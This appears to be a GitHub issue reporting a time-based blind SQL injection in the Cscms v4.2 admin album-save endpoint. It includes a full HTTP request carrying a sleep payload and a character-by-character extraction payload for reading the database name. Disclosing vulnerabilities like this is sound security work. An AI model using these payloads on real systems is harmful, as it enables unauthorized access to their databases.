SQL injection vulnerability exists in Cscms music portal system v4.2

#### Details

There is a SQL blind injection vulnerability in pic_Type.php_pl_save

There is an injection when adding an album to save, and the injection point is ID
```
POST /admin.php/pic/admin/type/pl_save HTTP/1.1
Host: cscms.test
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://cscms.test
Referer: http://cscms.test/admin.php/pic/admin/type?yid=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n7gacaf0cfrdgd78692oaa4f2li036fp;XDEBUG_SESSION=PHPSTORM
Connection: close

xid=1&csid[]=cid&id=7)and(sleep(5))--+
```

![image](https://user-images.githubusercontent.com/96719328/163909124-53bf97ee-bf21-4cdc-9a70-c74347a7722c.png)

construct payload to blast database

`(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)`

![image](https://user-images.githubusercontent.com/96719328/163909356-15624a0a-f93e-49ae-85eb-3af66fce7b29.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds,so the vulnerablity exisit

![image](https://user-images.githubusercontent.com/96719328/163909176-25a7b92d-d10c-4e1c-a06c-b505f9c9d452.png)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

SQL injection vulnerability exists in Cscms music portal system v4.2 #23

Details

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development